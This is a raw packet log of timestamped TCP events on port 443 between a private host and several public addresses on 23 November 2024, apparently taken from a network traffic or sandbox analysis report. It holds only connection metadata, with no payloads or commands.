                                                                                                                                                                                  Nov 23, 2024 19:53:00.873903990 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:00.873931885 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:00.874438047 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:00.874444962 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.021411896 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.022766113 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.022782087 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.023436069 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.023441076 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.078248978 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.079423904 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.079438925 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.080352068 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.080358982 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.097326994 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.098423004 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.098439932 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.104029894 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.104034901 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.145976067 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.146624088 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.146637917 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.147459984 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.147464037 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.315093040 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.315295935 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.315361023 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.315495968 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.315519094 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.315529108 CET49804443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.315534115 CET4434980413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.319569111 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.319593906 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.319751978 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.319957018 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.319969893 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.470470905 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.470562935 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.470640898 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.509340048 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.509349108 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.509358883 CET49808443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.509363890 CET4434980813.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.529861927 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.529877901 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.529946089 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.529989958 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530065060 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530189037 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530627966 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530642033 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530935049 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530946016 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530953884 CET49807443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.530957937 CET4434980713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.535593033 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.535624027 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.535732985 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.536159992 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.536170959 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571012020 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571033955 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571085930 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571096897 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571119070 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571166992 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571285009 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571290016 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571317911 CET49805443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.571321011 CET4434980513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.574721098 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.574733019 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.574806929 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.575105906 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.575118065 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.637312889 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.637384892 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.637481928 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.637492895 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.637664080 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.637676954 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.637684107 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.638010025 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.638200045 CET4434980913.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.638267040 CET49809443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.640185118 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.640213966 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.640472889 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.640608072 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:01.640619993 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.728276968 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.728524923 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:53:01.728538990 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.729537010 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.729595900 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:53:01.730556965 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:53:01.730619907 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.770360947 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:53:01.770366907 CET44349810172.217.21.36192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:01.819696903 CET49810443192.168.2.7172.217.21.36
                                                                                                                                                                                  Nov 23, 2024 19:53:02.337734938 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.337810040 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.339682102 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.339685917 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.340099096 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.381035089 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.423371077 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.879118919 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.879203081 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.879304886 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.879329920 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.879343987 CET49812443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.879348993 CET443498122.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.918261051 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.918286085 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:02.918551922 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.918817043 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:02.918832064 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.131586075 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.134525061 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.134548903 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.135096073 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.135103941 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.156378031 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.156419039 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.156609058 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.156876087 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.156887054 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.207973957 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.207997084 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.208087921 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.208287001 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.208302975 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.351622105 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.360965967 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.363502026 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.363516092 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.363847017 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.363863945 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.363976002 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.363980055 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.364445925 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.364449978 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.462567091 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.465336084 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.465358019 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.466022968 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.466028929 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.471738100 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.472121954 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.472178936 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.472804070 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.472822905 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.602689028 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.602797985 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.602910042 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.602929115 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.605650902 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.610802889 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.610815048 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.610878944 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.611166954 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.611251116 CET4434981313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.611327887 CET49813443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.632210970 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.632246017 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.632484913 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.632705927 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.632719994 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.818247080 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.821122885 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.821202993 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.822447062 CET49815443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.822463036 CET4434981513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.825238943 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.825259924 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.825352907 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.825562954 CET49824443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.825577021 CET4434982413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.839339018 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.839358091 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.839437008 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.839447975 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.840519905 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.840573072 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.906080961 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.909266949 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.909359932 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.912725925 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.912744999 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.912775040 CET49814443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.912781000 CET4434981413.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.914973974 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.915083885 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.915185928 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.915518045 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.915529966 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.915540934 CET49817443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.915546894 CET4434981713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.923585892 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.923593998 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:03.923683882 CET49816443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:03.923690081 CET4434981613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.107455015 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.107462883 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.107552052 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.107748032 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.107772112 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.107897997 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.108095884 CET49825443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.108107090 CET4434982513.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.108129978 CET49826443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.108143091 CET4434982613.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.108738899 CET49827443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.108745098 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.108840942 CET49827443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.109235048 CET49827443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.109246016 CET4434982713.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.333519936 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.333590984 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:04.337122917 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:04.337129116 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.337376118 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.338776112 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:04.383331060 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.873147964 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.873223066 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.873284101 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:04.873980045 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:04.873992920 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.874030113 CET49818443192.168.2.72.18.109.164
                                                                                                                                                                                  Nov 23, 2024 19:53:04.874036074 CET443498182.18.109.164192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.985635042 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.989331961 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.989347935 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.990396023 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:04.990454912 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:04.994448900 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.037390947 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.041523933 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.041534901 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.042829990 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.042912006 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.049491882 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.049786091 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.050692081 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.050704956 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.053034067 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.053150892 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.055711031 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.055720091 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.099111080 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.099220991 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.429078102 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.432379961 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.432405949 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.432998896 CET49823443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.433007002 CET4434982313.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503308058 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503340960 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503350019 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503376961 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503390074 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503413916 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503429890 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503438950 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503462076 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.503485918 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.504884005 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.504915953 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.505008936 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.505367994 CET49830443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.505382061 CET4434983013.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660679102 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660713911 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660723925 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660741091 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660749912 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660758018 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660767078 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660778999 CET4434982213.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660808086 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.660832882 CET49822443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.687464952 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.687489033 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.687566042 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.687566042 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.687577009 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.687630892 CET49821443192.168.2.713.107.246.63
                                                                                                                                                                                  Nov 23, 2024 19:53:05.738972902 CET4434982113.107.246.63192.168.2.7
                                                                                                                                                                                  Nov 23, 2024 19:53:05.738993883 CET4434982113.107.246.63192.168.2.7
